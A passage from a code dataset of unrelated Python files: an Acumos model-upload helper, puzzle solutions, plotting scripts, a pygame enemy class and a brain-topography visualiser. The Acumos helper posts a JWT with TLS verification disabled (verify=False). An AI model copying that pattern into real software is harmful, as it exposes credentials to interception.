_LICENSE_NAME)\n if isfile(license_str):\n shutil.copy(license_str, license_dst)\n else:\n license_dict = {'license': license_str} # the license team hasn't defined a license schema yet\n dump_artifact(license_dst, data=license_dict, module=json, mode='w')\n\n\ndef _post_model(files, push_api, auth_api, tries, max_tries, extra_headers, options):\n '''Attempts to post the model to Acumos'''\n headers = {'Authorization': get_jwt(auth_api),\n 'isCreateMicroservice': 'true' if options.create_microservice else 'false',\n 'deploy': 'true' if options.deploy else 'false'}\n if extra_headers is not None:\n headers.update(extra_headers)\n\n resp = requests.post(push_api, files=files, headers=headers, verify=False)\n\n if resp.ok:\n response = resp.json()\n try:\n if options.create_microservice:\n logger.info(\"Model pushed successfully to {} model URI {} \".format(push_api, response['dockerImageUri']))\n else:\n logger.info(\"Model pushed successfully to {} \".format(push_api))\n except KeyError:\n logger.info(\"Model pushed successfully to {} \".format(push_api))\n else:\n clear_jwt()\n if resp.status_code == 401 and tries != max_tries:\n logger.warning('Model push failed due to an authorization failure. Clearing credentials and trying again')\n _post_model(files, push_api, auth_api, tries + 1, max_tries, extra_headers, options)\n else:\n raise AcumosError(\"Model push failed: {}\".format(_ServerResponse(resp.status_code, resp.reason, resp.text)))\n","sub_path":"acumos_cpp/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"143834587","text":"from math import ceil, log2\n\ndef clever(x):\n ans = 2**ceil(log2(x)) - x - 1\n if not (x & (x - 1)):\n ans += x\n return ans\n\nfor case in range(int(input())):\n print(clever(int(input())))\n","sub_path":"competitions/weekofcode28/great_xor.py","file_name":"great_xor.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"578052069","text":"import inspect\nimport logging\nimport os\n\nimport tmdbsimple as tmdb\n\nfrom adapters.cinema_city import theatres as cc_theatres\nfrom adapters.common import TheatreAdapter\nfrom adapters.yes_planet import theatres as yp_theatres\n\nDEBUG = True\n\nAdapterBaseClass = TheatreAdapter\n# Disable requests and urllib3 logging\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\nstream_handler = logging.StreamHandler()\nlogging_format = \"%(asctime)s [%(levelname)s] [%(name)s] [%(funcName)s] - %(message)s\"\n\nlogging.basicConfig(\n handlers=[stream_handler],\n format=logging_format,\n level=logging.DEBUG if DEBUG else logging.INFO,\n)\ncc_adapters = []\nfor name, adapter in inspect.getmembers(cc_theatres, inspect.isclass):\n if adapter.__module__ == cc_theatres.__name__:\n if issubclass(adapter, AdapterBaseClass):\n cc_adapters.append(adapter())\n\nyp_adapters = []\nfor name, adapter in inspect.getmembers(yp_theatres, inspect.isclass):\n if adapter.__module__ == yp_theatres.__name__:\n if issubclass(adapter, AdapterBaseClass):\n yp_adapters.append(adapter())\n\nadapters = cc_adapters + yp_adapters\n\nTMDB_API_KEY = os.getenv(\"TMDB_API_KEY\", None)\ntmdb.API_KEY = TMDB_API_KEY\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"562757673","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.arange(0, 2*np.pi, 0.1)\ny = np.sin(x)\nz = np.cos(x)\nt = np.tan(x)\n\nplt.plot(x,y,x,z,x,t)\nplt.xlim(0, 10)\nplt.ylim(-1.5, 1.5)\nplt.xlabel('x from 0 to 2*pi', fontsize = 12)\nplt.ylabel('Sin and Cos', fontsize = 12)\nplt.legend(['Sin', 'Cos', 'Tan'], loc = \"upper right\", frameon = False, fontsize = 10)\nplt.title('Assignment 1', loc='left', fontsize = 20)\nplt.show()\n","sub_path":"NewAssignment1.py","file_name":"NewAssignment1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"62999162","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, TextBox, RadioButtons\n\nfrom utils import *\n\nclass GUI():\n def __init__(self):\n self.axcolor = 'lightgrey'\n self.fig = plt.figure(figsize=(8, 6))\n self.updating_status = False\n self.main()\n \n def main(self):\n self.calc_infos()\n self.init_figure()\n self.init_control_zone()\n self.init_result_zone()\n self.add_events()\n plt.show()\n\n def calc_infos(self, algorithm=0):\n self.t_r2, self.s, self.Q, self.x_bias, self.y_bias, self.RMSE, self.W_p, self.rac_u_p, self.s_p, self.t_r2_p, self.T, self.S = run_AutoFit(algorithm)\n \n def init_figure(self):\n ######## Plot Zone ########\n ax = self.fig.add_subplot(1,1,1)\n plt.subplots_adjust(bottom=0.42, left=0.18, right=0.65)\n\n rec_u, W_std = W_u_std(1e-8, 10, 0.01)\n self.l, = plt.plot(self.t_r2+self.x_bias, self.s+self.y_bias, 's', color='maroon',\n markersize=5, label='measurement data')\n plt.plot(rec_u, W_std, color='k',\n linewidth=0.85, label='theis type-curve')\n plt.xlabel(r'lg$(\\frac{1}{u})$ ', fontsize=10)\n plt.ylabel(r'lg$(W)$', fontsize=10)\n plt.xlim(np.min(self.t_r2+self.x_bias)-1, np.max(self.t_r2+self.x_bias)+1)\n plt.ylim(np.min(self.s+self.y_bias)-1, np.max(self.s+self.y_bias)+0.5)\n plt.grid(True, ls='--', lw=.5, c='k', alpha=0.6)\n plt.legend(fontsize=8)\n plt.suptitle(\"Theis Type-curve Fitting\")\n\n def init_control_zone(self):\n ######## Control Zone ########\n contrl_ax = plt.axes([0.05, 0.05, 0.90, 0.27])\n plt.text(0.035, 0.85, 'Control Zone')\n contrl_ax.set_xticks([])\n contrl_ax.set_yticks([])\n\n # slider\n ax_xbias = plt.axes([0.14, 0.21, 0.35, 0.03], facecolor=self.axcolor)\n ax_ybias = plt.axes([0.14, 0.16, 0.35, 0.03], facecolor=self.axcolor)\n\n self.s_xbias = Slider(ax_xbias, 'x_bias', 0.0, 5, valinit=self.x_bias)\n self.s_ybias = Slider(ax_ybias, 'y_bias', 0.0, 5, valinit=self.y_bias)\n\n # buttons\n aftax = plt.axes([0.8, 0.06, 0.1, 0.04])\n self.reset_button = Button(aftax, 'RESET', color=self.axcolor, hovercolor='mistyrose')\n\n x_bias_dec_tax = plt.axes([0.57, 0.21, 0.03, 0.03])\n self.x_bias_dec_button = Button(x_bias_dec_tax, '-', color=self.axcolor, hovercolor='mistyrose')\n\n x_bias_inc_tax = plt.axes([0.72, 0.21, 0.03, 0.03])\n self.x_bias_inc_button = Button(x_bias_inc_tax, '+', color=self.axcolor, hovercolor='mistyrose')\n\n y_bias_dec_tax = plt.axes([0.57, 0.16, 0.03, 0.03])\n self.y_bias_dec_button = Button(y_bias_dec_tax, '-', color=self.axcolor, hovercolor='mistyrose')\n\n y_bias_inc_tax = plt.axes([0.72, 0.16, 0.03, 0.03])\n self.y_bias_inc_button = Button(y_bias_inc_tax, '+', color=self.axcolor, hovercolor='mistyrose')\n\n # textbox\n xtextax = plt.axes([0.61, 0.21, 0.1, 0.03])\n ytextax = plt.axes([0.61, 0.16, 0.1, 0.03])\n self.t_xbias = TextBox(xtextax, ' ', str(float('%.2f' %self.x_bias)))\n self.t_ybias = TextBox(ytextax, ' ', str(float('%.2f' %self.y_bias)))\n\n # radio button\n rax = plt.axes([0.78, 0.12, 0.15, 0.17], facecolor=self.axcolor)\n plt.title('AutoFit Algorithms', fontsize=8)\n self.algos = np.array(['Traverse', 'Mass Center', 'Slope'])\n self.radio = RadioButtons(rax, self.algos, active=0)\n\n def init_result_zone(self, ):\n ######## Result Zone ########\n re_ax = plt.axes([0.70, 0.37, 0.20, 0.50])\n plt.text(0.035, 0.95, 'Results Zone')\n re_ax.set_xticks([])\n re_ax.set_yticks([])\n\n self.W_l = plt.text(0.2, 0.85, r'$W: %.2f $' %(self.W_p))\n self.u_l = plt.text(0.2, 0.75, r'$1/u: %.2f $' %(self.rac_u_p))\n self.s_l = plt.text(0.2, 0.65, r'$s: %.2f $' %(self.s_p))\n self.tr2_l = plt.text(0.2, 0.55, r'$t/r^2: %.4f $' %(self.t_r2_p))\n self.T_l = plt.text(0.2, 0.45, r'$T: %.2f m^3/d$' %(self.T))\n self.S_l = plt.text(0.2, 0.35, r'$S: %.6f $' %(self.S))\n plt.text(0.035, 0.2, 'Statistics of Fitting')\n self.RMSE_l = plt.text(0.2, 0.1, r'$RMSE: %.4f$' %(self.RMSE))\n\n def add_events(self):\n self.s_xbias.on_changed(self.update_x)\n self.s_ybias.on_changed(self.update_y)\n self.reset_button.on_clicked(self.reset)\n self.x_bias_dec_button.on_clicked(self.dec_x_bias)\n self.x_bias_inc_button.on_clicked(self.inc_x_bias)\n self.y_bias_dec_button.on_clicked(self.dec_y_bias)\n self.y_bias_inc_button.on_clicked(self.inc_y_bias)\n self.t_xbias.on_submit(self.submit_x)\n self.t_ybias.on_submit(self.submit_y)\n self.radio.on_clicked(self.chg_algorithm)\n\n def chg_result(self, t_r2, s, x_bias, y_bias):\n \"\"\" change the results in the results zone \"\"\"\n self.W_p, self.rac_u_p, self.s_p, self.t_r2_p, self.T, self.S = calResult(self.t_r2, self.s, self.Q, self.x_bias, self.y_bias, num=2)\n self.W_bias = (W(1/(10**(t_r2+float('%2f' %x_bias)))))\n self.RMSE = np.sqrt(np.mean((self.W_bias - 10**(s+float('%.2f' %y_bias))) ** 2))\n\n self.W_l.set_text(r'$W: %.2f $' %(self.W_p))\n self.u_l.set_text(r'$1/u: %.2f $' %(self.rac_u_p))\n self.s_l.set_text(r'$s: %.2f $' %(self.s_p))\n self.tr2_l.set_text(r'$t/r^2: %.4f $' %(self.t_r2_p))\n self.T_l.set_text(r'$T: %.2f m^3/d$' %(self.T))\n self.S_l.set_text(r'$S: %.6f $' %(self.S))\n self.RMSE_l.set_text(r'$RMSE: %.4f$' %(self.RMSE))\n\n\n\n def update_x(self, x_bias):\n \"\"\"update all widgets with new x_bias\"\"\"\n # 防抖\n if self.updating_status:\n return \n\n x_bias = float('%.2f' %x_bias)\n if x_bias == self.x_bias:\n return\n\n self.updating_status = True\n self.x_bias = x_bias\n self.s_xbias.set_val(float('%.2f' %self.x_bias))\n self.t_xbias.set_val(float('%.2f' %self.x_bias))\n self.l.set_xdata(self.t_r2+self.x_bias)\n\n self.fig.canvas.draw_idle()\n self.chg_result(self.t_r2, self.s, self.x_bias, self.y_bias)\n self.updating_status = False\n\n def update_y(self, y_bias):\n \"\"\"update all widgets with new y_bias\"\"\"\n # 防抖\n if self.updating_status:\n return \n\n y_bias = float('%.2f' %y_bias)\n if y_bias == self.y_bias:\n return\n\n self.updating_status = True\n self.y_bias = y_bias\n self.s_ybias.set_val(float('%.2f' %self.y_bias))\n self.t_ybias.set_val(float('%.2f' %self.y_bias))\n self.l.set_ydata(self.s+self.y_bias)\n\n self.fig.canvas.draw_idle()\n self.chg_result(self.t_r2, self.s, self.x_bias, self.y_bias)\n self.updating_status = False\n\n def reset(self, event):\n \"\"\" reset the figure \"\"\"\n self.radio.set_active(0)\n\n def dec_x_bias(self, event):\n \"\"\" decrease the x_bias using '-' button \"\"\"\n self.update_x(self.x_bias-0.01)\n\n def inc_x_bias(self, event):\n \"\"\" increase the x_bias using '+' button \"\"\"\n self.update_x(self.x_bias+0.01)\n\n def dec_y_bias(self, event):\n \"\"\" decrease the y_bias using '-' button \"\"\"\n self.update_y(self.y_bias-0.01)\n\n def inc_y_bias(self, event):\n \"\"\" increase the y_bias using '+' button \"\"\"\n self.update_y(self.y_bias+0.01)\n\n def submit_x(self, text):\n \"\"\" updates the figure using textbox (x_bias)\"\"\"\n self.update_x(float(text))\n\n def submit_y(self, text):\n \"\"\" updates the figure using textbox (y_bias)\"\"\"\n self.update_y(float(text))\n\n def chg_algorithm(self, label):\n algorithm = np.argwhere(self.algos==label)[0][0]\n # t_r2, s, Q, x_bias, y_bias, RMSE, W_p, rac_u_p, s_p, t_r2_p, T, S = run_AutoFit(algorithm)\n self.calc_infos(algorithm)\n self.update_x(self.x_bias)\n self.update_y(self.y_bias)\n\n\n\n\n","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"296409592","text":"import pygame\nfrom pistol import Pistol\nimport random\n\n\nclass Enemy(pygame.sprite.Sprite):\n \"\"\"The enemy is automated\n \n Attributes:\n left (int): the far left of the platform the enemy is on\n right (int): the far right of the platform the enemy in on\n shift_x (int): speed in x direction.\n image(surface): image to be played on the main surface\n rect(pygame.rect): Rectangle of the image\n index(int) = the current index for which of the images to blit\n shot_list(list(Pistol)): a list of pistol objects\n is_shoot(boolean): for if the enemy is shooting\n generated_shot(int): The restriction on how fast the enemy shoots\n cal(int): calcualte the next shot\n melee(boolean): boolean to see if the player can only perform melee attacks\n \"\"\"\n \n def __init__(self, left, right, screen):\n self.screen = screen\n super().__init__()\n self.list = self.__create_run_list()\n self.image = self.list[0]\n self.rect = self.list[0].get_rect()\n self.left = left \n #the where the enemy will spawn\n self.rect.x = left \n self.right = right \n self.shift_x = -2\n self.index = 0\n self.is_shoot = False\n self.shot_list = []\n self.cal = 0\n self.melee = False\n self.generated_shot = random.randint(100, 200)\n \n def __create_run_list(self): \n list = []\n for i in range(0,8):\n image = pygame.image.load(\"images/Run (\"+ str(i + 1) +\").png\")\n image = pygame.transform.scale(image, (100,100))\n list.insert(i, image)\n image = pygame.transform.flip(image, True, False)\n list.insert(i+8, image)\n for i in range(0,4):\n image = pygame.image.load(\"images/Shoot (\"+ str(i + 1) +\").png\")\n image = pygame.transform.scale(image, (100,100))\n list.insert(i+15, image)\n image = pygame.transform.flip(image, True, False)\n list.insert(i+19, image)\n return list \n \n def walk(self, left, right, y):\n \"\"\" The automated walking for the AI\n \n Args:\n left(int): the left x coordinate of the walk restrictions\n right(int) the right x coordinate of the walk restriction\n y(int): the bottom y coordinate of the placement\n \n \"\"\"\n def die(self):\n \"\"\" Play the death sound \"\"\"\n death_sound = pygame.mixer.Sound('sound/Scream_And_Die_Fx-SoundBible.ogg')\n death_sound.set_volume(.35)\n death_sound.play()\n \n def __end(self):\n \"\"\" change the direction of the of the Ai if it has reached the edge \"\"\"\n #print('called')\n if self.rect.x <= self.left - 15:\n #print('called2')\n self.shift_x = 2\n self.index = 0\n elif self.rect.right >= self.right + 15:\n self.index = 9\n self.shift_x = -2\n \n def __shoot(self, left):\n if left:\n pistol = Pistol(self.screen,self.rect.x-50, self.rect.y-50, True)\n pistol.shift_x = -5\n self.shot_list.append(pistol)\n else:\n pistol = Pistol(self.screen,self.rect.x-50, self.rect.y-50, False)\n pistol.shift_x = 5\n self.shot_list.append(pistol)\n \n def __draw_bullet(self):\n for bullet in self.shot_list:\n bullet.update()\n \n def draw(self, screen):\n \"\"\" Draw the enemy on the main surface. This will also update the bullet\n in the game so it can be drawn in the main surface\n \n Args:\n screen(Surface) main screen for which the game will be played\n \"\"\"\n self.screen = screen\n #blit the screen\n screen.blit(self.list[self.index], (self.rect.x, self.rect.y))\n #update and draw the bullets\n for bullet in self.shot_list:\n bullet.update() \n \n def update(self):\n \"\"\" Update the enemy and all the info. \"\"\"\n #enemy as at the end of the platform\n self.__end()\n \n self.rect.x += self.shift_x\n self.image = self.list[self.index]\n\n self.__draw_bullet()\n \n #if the enemy is not in melee begin calcuations for generated shot\n if not self.melee:\n self.cal +=1\n else:\n self.cal = 1\n \n ################Handling of the index################################\n #end of run list\n if self.index == 7:\n self.index = 0\n elif self.index == 14:\n self.index = 8\n elif self.index == 18:\n #start running to the right\n self.shift_x = 2\n self.index = 0\n elif self.index == 22:\n #start running to the left\n self.shift_x = -2\n self.index = 8\n else:\n self.index += 1\n #######################################################################\n \n #if teh player is facing left\n if self.rect.x < 1000 and self.cal % self.generated_shot == 0 and\\\n 7< self.index < 14: \n self.shift_x = 0\n self.index = 19\n self.__shoot(True)\n #if the player is facing the right\n elif self.rect.x < 1000 and self.cal % self.generated_shot ==0 and\\\n 0 < self.index < 8: \n self.shift_x = 0\n self.index = 15\n self.__shoot(False)\n \n\n","sub_path":"rasecgame/rasaec/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"320634397","text":"t = int(input())\nfor index in range(t):\n l = input().split(\" \")\n len = int(l[0])\n k = int(l[1])\n numbers = input().split(\" \")\n startPoint = 0\n while startPoint < len:\n endPoint = min(startPoint+k, len)\n while endPoint > startPoint + 1:\n for i in range(startPoint, endPoint-1):\n if int(numbers[i]) < int(numbers[i+1]):\n temp = numbers[i+1]\n numbers[i+1] = numbers[i]\n numbers[i] = temp\n endPoint -=1\n startPoint += k\n for i in range(len):\n if i == len-1:\n print(numbers[i], end=\" \\n\")\n else:\n print(numbers[i], end=\" \")\n","sub_path":"Code/CodeRecords/2342/60619/237909.py","file_name":"237909.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266035449","text":"#!/usr/bin/env python\n\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport sys\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='performance info scatter')\nparser.add_argument('filepath', nargs='?')\nargs = parser.parse_args()\n\nfilepath = args.filepath or sys.stdin\n\ndf = pd.read_csv(filepath, index_col='time')\npca = PCA(n_components=2)\n\ncoords = pca.fit_transform(df.transpose())\nx = [v[0] for v in coords]\ny = [v[1] for v in coords]\n\nplt.scatter(x, y)\n\nfor i, txt in enumerate(df.columns):\n plt.annotate(txt, (x[i], y[i]))\n\nplt.show()\n\n","sub_path":"samples/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592422590","text":"import sys\nfrom struct import unpack\nfrom PIL import Image, ImageDraw\n\nassert(len(sys.argv) == 3)\nimage_path = str(sys.argv[1])\nres_path = str(sys.argv[2])\n\nimg = Image.open(image_path)\nboxes = []\nwith open(res_path, 'rb') as f:\n data = f.read()\n for i in range(len(data) / 4):\n boxes.append(unpack('f', data[i * 4 : i * 4 + 4])[0] * max(img.size[0], img.size[1]))\n\ndraw = ImageDraw.Draw(img)\nfor i in range(len(boxes) / 4):\n draw.rectangle([boxes[i * 4 + 1], boxes[i * 4 + 0], boxes[i * 4 + 3], boxes[i * 4 + 2]], outline=(255, 0, 0))\n\nimg.show()\n","sub_path":"workspace/det/tf_coreml_utils/frcnn_tf2coreml_zcr/coreml-py/vis_result.py","file_name":"vis_result.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310842344","text":"#-*- coding:utf-8 -*-\n# ==============================================================================\n# Copyright 2016 Windy Darian (Ruoyu Fan)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n'''\nCreated on March 19, 2016\nhttps://leetcode.com/problems/reconstruct-itinerary/\n@author: Windy Darian (Ruoyu Fan)\n'''\n\n# Note: I should have used Hierholzer's algorithm for the Eulerian path but...\n\n\nfrom bisect import insort_left\n\n\nclass Solution(object):\n def add_tickets(self, tickets):\n # type: list[[str,str]] -> None\n \"\"\"\n add tickets to the tickets to choose from.\n used in initialization and putting tickets back when find a wrong\n itinerary\n \"\"\"\n for ticket in tickets:\n if ticket[0] not in self.ticket_dict:\n self.ticket_dict[ticket[0]] = [ticket]\n else:\n # always insert in order so the result is always of a smaller\n # lexical order\n insort_left(self.ticket_dict[ticket[0]], ticket)\n\n def search_itinerary(self, from_key):\n # type: str -> list[[str, str]]\n \"\"\"\n given a starting airport, recursively return a valid itinerary that uses\n up all tickets\n \"\"\"\n tickets_from_key = self.ticket_dict.get(from_key)\n if not tickets_from_key:\n return []\n\n from_index = 0\n while True:\n current_ticket = tickets_from_key.pop(from_index)\n results = [current_ticket]\n results.extend(self.search_itinerary(current_ticket[1]))\n if not tickets_from_key:\n return results\n # else\n # if there are tickets left, it is not a valid itinerary, return\n # all the tickets to the ticket_dict and begin another search\n self.add_tickets(results)\n from_index = from_index + 1\n\n\n def findItinerary(self, tickets):\n # LeetCode solution entry\n \"\"\"\n :type tickets: List[List[str]]\n :rtype: List[str]\n \"\"\"\n self.ticket_dict = {}\n self.add_tickets(tickets)\n tickets_route = self.search_itinerary(\"JFK\")\n\n if not tickets_route:\n return []\n\n result = [tickets_route[0][0]]\n for ticket in tickets_route:\n result.append(ticket[1])\n\n return result\n","sub_path":"leetcode/_332_reconstruct_itinerary.py","file_name":"_332_reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134330366","text":"# -*- coding: utf-8 -*-\n#\n#\n# TheVirtualBrain-Framework Package. This package holds all Data Management, and \n# Web-UI helpful to run brain-simulations. To use it, you also need do download\n# TheVirtualBrain-Scientific Package (for simulators). See content of the\n# documentation-folder for more details. See also http://www.thevirtualbrain.org\n#\n# (c) 2012-2013, Baycrest Centre for Geriatric Care (\"Baycrest\")\n#\n# This program is free software; you can redistribute it and/or modify it under \n# the terms of the GNU General Public License version 2 as published by the Free\n# Software Foundation. This program is distributed in the hope that it will be\n# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public\n# License for more details. You should have received a copy of the GNU General \n# Public License along with this program; if not, you can download it here\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0\n#\n#\n# CITATION:\n# When using The Virtual Brain for scientific publications, please cite it as follows:\n#\n# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,\n# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)\n# The Virtual Brain: a simulator of primate brain network dynamics.\n# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)\n#\n#\n\"\"\"\n.. moduleauthor:: Ionel Ortelecan \n.. moduleauthor:: Lia Domide \n\"\"\"\nimport numpy\nimport pylab\nfrom scipy.optimize import leastsq\nfrom matplotlib.mlab import griddata\nfrom matplotlib import colors\nfrom tvb.core.adapters.abcdisplayer import ABCMPLH5Displayer\nfrom tvb.datatypes.graph import ConnectivityMeasure\nfrom tvb.basic.filters.chain import FilterChain\n\n\n\nclass BaseTopography():\n \"\"\"\n Base class for topographic visualizers.\n \"\"\"\n # the following fields aren't changed from GUI\n plotsensors = False\n plothead = True\n masked = True\n # this field may be modified from the GUI\n plot_contours = False\n\n # dictionaries that contains processed data\n head_contour = None\n sensor_locations = None\n topography_data = None\n\n\n def get_required_memory_size(self, **kwargs):\n \"\"\"\n Return the required memory to run this algorithm.\n \"\"\"\n # Don't know how much memory is needed.\n return -1\n\n\n def init_topography(self, sensor_locations):\n \"\"\"\n Initialize entities for topographic computation.\n \"\"\"\n self.topography_data = self.prepare_sensors(sensor_locations, resolution=51)\n self.head_contour = self.compute_head_contour(self.topography_data)\n self.sensor_locations = self.compute_sensors(self.topography_data)\n\n\n def draw_head_topo(self, figure, topography, color_bar_min=0, color_bar_max=0):\n \"\"\"\n Draw Head top view.\n \"\"\"\n self._fit_topology(figure, topography, self.topography_data, color_bar_min, color_bar_max)\n if self.plothead:\n # draw head contour\n figure.gca().plot(self.head_contour[\"x_arr\"], self.head_contour[\"y_arr\"],\n color=self.head_contour[\"color\"], linewidth=self.head_contour[\"linewidth\"])\n if self.plotsensors:\n # Draw Sensors\n figure.gca().plot(self.sensor_locations[\"x_arr\"], self.sensor_locations[\"y_arr\"],\n self.sensor_locations[\"marker\"])\n\n\n def _fit_topology(self, figure, topography, topography_data, color_bar_min, color_bar_max):\n \"\"\"\n Trim data, to make sure everything is inside the head contour.\n \"\"\"\n x_arr = topography_data[\"x_arr\"]\n y_arr = topography_data[\"y_arr\"]\n circle_x = topography_data[\"circle_x\"]\n circle_y = topography_data[\"circle_y\"]\n rad = topography_data[\"rad\"]\n\n topo = griddata(topography_data[\"sproj\"][:, 0], topography_data[\"sproj\"][:, 1],\n numpy.ravel(numpy.array(topography)), x_arr, y_arr)\n if self.plot_contours:\n #draw the contours\n figure.gca().contour(x_arr, y_arr, topo, 10, colors='k', origin=\"lower\", hold='on')\n\n # mask values outside the head\n if self.masked:\n notinhead = numpy.greater_equal((x_arr - circle_x) ** 2 + (y_arr - circle_y) ** 2, (1.0 * rad) ** 2)\n topo = numpy.ma.masked_where(notinhead, topo)\n\n # show surface\n map_surf = figure.gca().imshow(topo, origin=\"lower\", extent=(-rad, rad, -rad, rad))\n\n if not (color_bar_min == 0 and color_bar_max == 0):\n norm = colors.Normalize(vmin=color_bar_min, vmax=color_bar_max)\n map_surf.set_norm(norm)\n figure.colorbar(map_surf)\n figure.gca().set_axis_off()\n return map_surf\n\n\n @staticmethod\n def prepare_sensors(sensor_locations, resolution=51):\n \"\"\"\n Common method, to pre-process sensors before display (project them in 2D).\n \"\"\"\n\n\n def sphere_fit(params):\n \"\"\"Function to fit the sensor locations to a sphere\"\"\"\n return ((sensor_locations[:, 0] - params[1]) ** 2 + (sensor_locations[:, 1] - params[2]) ** 2\n + (sensor_locations[:, 2] - params[3]) ** 2 - params[0] ** 2)\n\n\n (radius, circle_x, circle_y, circle_z) = leastsq(sphere_fit, (1, 0, 0, 0))[0]\n # size of each square\n ssh = float(radius) / resolution # half-size\n # Generate a grid and interpolate using the gridData module\n x_arr = numpy.arange(circle_x - radius, circle_x + radius, ssh * 2.0) + ssh\n y_arr = numpy.arange(circle_y - radius, circle_y + radius, ssh * 2.0) + ssh\n x_arr, y_arr = pylab.meshgrid(x_arr, y_arr)\n\n # project the sensor locations onto the sphere\n sproj = sensor_locations - numpy.array((circle_x, circle_y, circle_z))\n sproj = radius * sproj / numpy.c_[numpy.sqrt(numpy.sum(sproj ** 2, axis=1))]\n sproj += numpy.array((circle_x, circle_y, circle_z))\n return dict(sproj=sproj, x_arr=x_arr, y_arr=y_arr,\n circle_x=circle_x, circle_y=circle_y, rad=radius)\n\n\n @staticmethod\n def compute_sensors(topography_data):\n \"\"\"\n Get locations for the sensors, based on connectivity's projection.\n \"\"\"\n sproj = topography_data[\"sproj\"]\n circle_x = topography_data[\"circle_x\"]\n circle_y = topography_data[\"circle_y\"]\n\n zenum = [x[::-1] for x in enumerate(sproj[:, 2].tolist())]\n zenum.sort()\n indx = [x[1] for x in zenum]\n return dict(x_arr=sproj[indx, 0] - circle_x / 2.0, y_arr=sproj[indx, 1] - circle_y / 2.0, marker='wo')\n\n\n @staticmethod\n def compute_head_contour(topography_data, color='k', linewidth='5'):\n \"\"\"\n Plot the main contour (contour of the head).\n \"\"\"\n scale = topography_data[\"rad\"]\n shift = (topography_data[\"circle_x\"] / 2.0, topography_data[\"circle_y\"] / 2.0)\n\n rmax = 0.5\n fac = 2 * numpy.pi * 0.01\n # Coordinates for the ears\n ear_x1 = -1 * numpy.array([.497, .510, .518, .5299, .5419, .54, .547,\n .532, .510, rmax * numpy.cos(fac * (54 + 42))])\n ear_y1 = numpy.array([.0655, .0775, .0783, .0746, .0555, -.0055,\n -.0932, -.1313, -.1384, rmax * numpy.sin(fac * (54 + 42))])\n ear_x2 = numpy.array([rmax * numpy.cos(fac * (54 + 42)), .510, .532,\n .547, .54, .5419, .5299, .518, .510, .497])\n ear_y2 = numpy.array([rmax * numpy.sin(fac * (54 + 42)), -.1384, -.1313,\n -.0932, -.0055, .0555, .0746, .0783, .0775, .0655])\n # Coordinates for the Head\n head_x1 = numpy.fromfunction(lambda x: rmax * numpy.cos(fac * (x + 2)), (21,))\n head_y1 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 2)), (21,))\n head_x2 = numpy.fromfunction(lambda x: rmax * numpy.cos(fac * (x + 28)), (21,))\n head_y2 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 28)), (21,))\n head_x3 = numpy.fromfunction(lambda x: rmax * numpy.cos(fac * (x + 54)), (43,))\n head_y3 = numpy.fromfunction(lambda y: rmax * numpy.sin(fac * (y + 54)), (43,))\n # Coordinates for the Nose\n nose_x = numpy.array([.18 * rmax, 0, -.18 * rmax])\n nose_y = numpy.array([rmax - 0.004, rmax * 1.15, rmax - 0.004])\n # Combine to get the contour\n x_arr = numpy.concatenate((ear_x2, head_x1, nose_x, head_x2, ear_x1, head_x3))\n y_arr = numpy.concatenate((ear_y2, head_y1, nose_y, head_y2, ear_y1, head_y3))\n x_arr *= 2 * scale\n y_arr *= 2 * scale\n x_arr += shift[0]\n y_arr += shift[1]\n\n return dict(x_arr=x_arr, y_arr=y_arr, color=color, linewidth=linewidth)\n\n\n @classmethod\n def _normalize(cls, points_positions):\n \"\"\"Centers the brain.\"\"\"\n steps = []\n for column_idx in range(3):\n column = [row[column_idx] for row in points_positions]\n step = (max(column) + min(column)) / 2.0\n steps.append(step)\n step = numpy.array(steps)\n return points_positions - step\n\n\n\nclass TopographicViewer(BaseTopography, ABCMPLH5Displayer):\n 